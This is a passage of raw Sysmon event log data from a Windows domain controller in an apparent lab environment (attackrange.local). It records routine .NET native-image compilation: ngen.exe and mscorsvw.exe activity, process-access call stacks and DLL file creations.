.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:22.318{08A6967A-454F-6000-7C01-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1374-0\Microsoft.ActiveDirectory.Management.dll2021-01-14 13:21:22.318 10341000x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.928{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4553-6000-8201-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.912{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4553-6000-8201-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.912{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4553-6000-8201-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:23.897{08A6967A-4553-6000-8101-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bcc-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-01-14 13:21:23.897 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.818{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4553-6000-8101-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.803{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4553-6000-8101-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.803{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4553-6000-8101-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.662{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4553-6000-8001-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.647{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4553-6000-8001-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:23.647{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4553-6000-8001-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:23.600{08A6967A-4552-6000-7F01-000000009A01}1168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\490-0\Microsoft.GroupPolicy.Targeting.dll2021-01-14 13:21:23.600 10341000x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.990{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8C01-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.975{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8C01-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.975{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8C01-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:24.959{08A6967A-4554-6000-8B01-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ebc-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-01-14 13:21:24.959 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.865{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8B01-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.850{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8B01-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.850{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8B01-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.803{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8A01-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.803{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8A01-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.803{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8A01-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:24.787{08A6967A-4554-6000-8901-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1384-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-01-14 13:21:24.787 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.693{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8901-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.693{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8901-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.693{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4554-6000-8901-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.662{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4554-6000-8801-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:24.647{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4554-6000-8801-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 